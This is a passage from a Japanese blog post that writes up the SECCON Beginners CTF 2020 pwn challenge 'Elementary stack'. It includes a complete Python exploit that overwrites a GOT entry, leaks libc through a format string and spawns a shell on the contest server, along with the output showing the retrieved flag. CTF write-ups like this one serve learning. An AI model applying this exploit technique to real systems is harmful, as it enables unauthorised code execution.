<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;[info] success to exploit!!!&quot;</span><span class="token punctuation">)</span>
t <span class="token operator">=</span> telnetlib<span class="token punctuation">.</span>Telnet<span class="token punctuation">(</span><span class="token punctuation">)</span>
t<span class="token punctuation">.</span>sock <span class="token operator">=</span> s
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>実行するとフラグを得ることができました．</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>[info] success to exploit!!!
ls
chall
flag.txt
redir.sh
cat flag.txt
ctf4b{4bus1ng_st4ck_d03snt_n3c3ss4r1ly_m34n_0v3rwr1t1ng_r3turn_4ddr3ss}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><h4 id="攻撃コード"><a href="#攻撃コード" class="header-anchor">#</a> 攻撃コード</h4> <p>今回作成したコードはこちら．pwntools使えるように勉強しなくては．</p> <div class="language-python line-numbers-mode"><pre class="language-python"><code><span class="token keyword">import</span> socket<span class="token punctuation">,</span> time<span class="token punctuation">,</span> telnetlib
malloc_got <span class="token operator">=</span> <span class="token number">0x601038</span>
printf_plt <span class="token operator">=</span> <span class="token number">0x400590</span>
libc_start_main_symbol <span class="token operator">=</span> <span class="token number">0x21ab0</span>
libc_system <span class="token operator">=</span> <span class="token number">0x4f440</span>
s <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span>socket<span class="token punctuation">.</span>AF_INET<span class="token punctuation">,</span> socket<span class="token punctuation">.</span>SOCK_STREAM<span class="token punctuation">)</span>
s<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'es.quals.beginners.seccon.jp'</span><span class="token punctuation">,</span> <span class="token number">9003</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token string">b'-2\n'</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;[info] overwrite buffer address to atol@got&quot;</span><span class="token punctuation">)</span>
s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>malloc_got<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token comment"># malloc</span>
<span class="token comment"># s.sendall(str(0x601040).encode()) # atol</span>
<span class="token comment"># time.sleep(1)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;[info] overwrite atol@got to printf@plt&quot;</span><span class="token punctuation">)</span>
s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token string">b&quot;a&quot;</span><span class="token operator">*</span><span class="token number">8</span> <span class="token operator">+</span> printf_plt<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">'little'</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">b'\n'</span><span class="token punctuation">)</span> <span class="token comment"># printf</span>
<span class="token comment"># s.sendall((0x400590).to_bytes(8, 'little'))</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token string">b&quot;%25$p&quot;</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
libc_start_main <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">14</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span>
libc_base <span class="token operator">=</span> libc_start_main <span class="token operator">-</span> libc_start_main_symbol <span class="token operator">-</span> <span class="token number">231</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;[info] libc base: &quot;</span><span class="token punctuation">,</span> <span class="token builtin">hex</span><span class="token punctuation">(</span>libc_base<span class="token punctuation">)</span><span class="token punctuation">)</span>
system <span class="token operator">=</span> libc_base <span class="token operator">+</span> libc_system
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;[info] system: &quot;</span><span class="token punctuation">,</span> <span class="token builtin">hex</span><span class="token punctuation">(</span>system<span class="token punctuation">)</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token string">b&quot;/bin/sh\0&quot;</span> <span class="token operator">+</span> system<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">'little'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;[info] success to exploit!!!&quot;</span><span class="token punctuation">)</span>
t <span class="token operator">=</span> telnetlib<span class="token punctuation">.</span>Telnet<span class="token punctuation">(</span><span class="token punctuation">)</span>
t<span class="token punctuation">.</span>sock <span class="token operator">=</span> s
t<span class="token punctuation">.</span>interact<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br><span class="line-number">50</span><br></div></div><h3 id="まとめ"><a href="#まとめ" class="header-anchor">#</a> まとめ</h3> <p>非常に楽しい問題でした．pwnやってる気になりましたね．僕のような初心者が本番で特には難しい問題でしたが，一つ一つステップを踏んで理解すれば解ける問題でした．また，基本的なテクニックが詰まっている問題だったのでこれを自分で理解することができればレベルアップできる気がします．そういった意味で初心者にとってすごくいい問題だったと思います．ありがとうございました．</p></div></article> <section class="post-meta main-div" data-v-4e23451f><section class="post-date clearfix" data-v-4e23451f><span class="create-date" data-v-4e23451f>
      Created : 2020-06-04
    </span> <span class="update-date" data-v-4e23451f>
      Updated : 2020-06-04
    </span></section> <section class="post-links" data-v-4e23451f><a href="/posts/2020/05/24/ctf4b.html" class="post-link" data-v-4e23451f>
      Previous Post : SECCON Beginners CTF 2020解けた問題 writeup
    </a> <a href="/posts/2020/07/15/softether-api.html" class="post-link" data-v-4e23451f>
      Next Post : SoftEther VPN Server APIのGo版を作った
    </a></section></section> <div id="post-comments" class="main-div"><!----></div></div></main> <aside class="aside" data-v-4dd605a1><div class="info-card main-div" data-v-9d847660 data-v-4dd605a1><div class="info-card-header" style="background-size:cover;background-repeat:no-repeat;background-position:center;background-attachment:scroll;background-image:url(/img/bg.jpg);" data-v-9d847660><img src="/img/avatar.jpg" alt="terassyi" class="info-avatar" data-v-9d847660></div> <div class="info-card-body" data-v-9d847660><section class="info-nickname" data-v-9d847660>
      terassyi
    </section> <section class="info-desc" data-v-9d847660>Fortune favors the brave</section> <section class="info-contact" data-v-9d847660><section data-v-9d847660><span title="Fukuoka City, Japan" data-v-9d847660 data-v-9d847660><svg class="icon" style="font-size:1em;" data-v-9d847660 data-v-9d847660><title data-v-9d847660 data-v-9d847660>Fukuoka City, Japan</title><use xlink:href="#icon-location" data-v-9d847660 data-v-9d847660></use></svg><span class="info-text" data-v-9d847660 data-v-9d847660>
          Fukuoka City, Japan
        </span></span></section> <section data-v-9d847660><span title="Kyushu University" data-v-9d847660 data-v-9d847660><svg class="icon" style="font-size:1em;" data-v-9d847660 data-v-9d847660><title data-v-9d847660 data-v-9d847660>Kyushu University</title><use xlink:href="#icon-organization" data-v-9d847660 data-v-9d847660></use></svg><span class="info-text" data-v-9d847660 data-v-9d847660>
          Kyushu University
        </span></span></section> <section data-v-9d847660><a href="mailto:iscale821@gmail.com" title="iscale821@gmail.com" data-v-9d847660 data-v-9d847660><svg class="icon" style="font-size:1em;" data-v-9d847660 data-v-9d847660><title data-v-9d847660 data-v-9d847660>iscale821@gmail.com</title><use xlink:href="#icon-email" data-v-9d847660 data-v-9d847660></use></svg><span class="info-text" data-v-9d847660 data-v-9d847660>
          iscale821@gmail.com
        </span></a></section></section></div> <div class="info-card-footer" data-v-9d847660><section class="info-sns clearfix" data-v-9d847660><a href="https://github.com/terassyi" target="_blank" class="sns-link" data-v-9d847660><span title="GitHub: terassyi" class="sns-icon" data-v-9d847660 data-v-9d847660><svg class="icon" style="font-size:1.5em;" data-v-9d847660 data-v-9d847660><title data-v-9d847660 data-v-9d847660>GitHub: terassyi</title><use xlink:href="#icon-github" data-v-9d847660 data-v-9d847660></use></svg></span></a><a href="https://twitter.com/terassyi_" target="_blank" class="sns-link" data-v-9d847660><span title="Twitter: terassyi" class="sns-icon" data-v-9d847660 data-v-9d847660><svg class="icon" style="font-size:1.5em;" data-v-9d847660 data-v-9d847660><title data-v-9d847660 data-v-9d847660>Twitter: terassyi</title><use xlink:href="#icon-twitter" data-v-9d847660 data-v-9d847660></use></svg></span></a></section></div></div> <div class="post-nav-card main-div" style="position:relative;top:0;width:0px;" data-v-4dd605a1><div class="post-nav-contents"><svg class="icon"><title>book</title><use xlink:href="#icon-book"></use></svg> <span>Table of Contents</span> <div class="post-nav-toc"><ul><li><a href="/posts/2020/06/04/elementary-stack.html#elementary-stack">Elementary stack</a><ul><li><a href="/posts/2020/06/04/elementary-stack.html#解いてみる">解いてみる</a></li><li><a href="/posts/2020/06/04/elementary-stack.html#まとめ">まとめ</a></li></ul></li></ul></div></div> <div class="post-nav-comments"><svg class="icon"><title>comment</title><use xlink:href="#icon-comment"></use></svg> <a href="/posts/2020/06/04/elementary-stack.html#post-comments">
      Comments
    </a></div></div></aside></div> <footer class="footer" data-v-1375e54c><p class="footer-sns-links" data-v-1375e54c><a href="https://github.com/terassyi" target="_blank" class="sns-link" data-v-1375e54c><span title="GitHub: terassyi" class="sns-icon" data-v-1375e54c data-v-1375e54c><svg class="icon" style="font-size:25px;" data-v-1375e54c data-v-1375e54c><title data-v-1375e54c data-v-1375e54c>GitHub: terassyi</title><use xlink:href="#icon-github" data-v-1375e54c data-v-1375e54c></use></svg></span></a><a href="https://twitter.com/terassyi_" target="_blank" class="sns-link" data-v-1375e54c><span title="Twitter: terassyi" class="sns-icon" data-v-1375e54c data-v-1375e54c><svg class="icon" style="font-size:25px;" data-v-1375e54c data-v-1375e54c><title data-v-1375e54c data-v-1375e54c>Twitter: terassyi</title><use xlink:href="#icon-twitter" data-v-1375e54c data-v-1375e54c></use></svg></span></a></p> <p class="footer-text" data-v-1375e54c><span data-v-1375e54c>Powered by </span> <a href="https://github.com/vuejs/vuepress" target="_blank" data-v-1375e54c>
      VuePress
    </a> <span data-v-1375e54c> | </span> <a href="https://github.com/meteorlxy/vuepress-theme-meteorlxy" target="_blank" data-v-1375e54c>
        meteorlxy
      </a></p> <p class="footer-text" data-v-1375e54c>Copyright 2018-present <a href="https://github.com/meteorlxy" target="_blank">meteorlxy</a> | MIT License</p></footer></div><div class="global-ui"><!----><!----></div></div>
    <script src="/assets/js/app.dcfa1660.js" defer></script><script src="/assets/js/10.b0186384.js" defer></script><script src="/assets/js/20.285273ee.js" defer></script>
  </body>
</html>
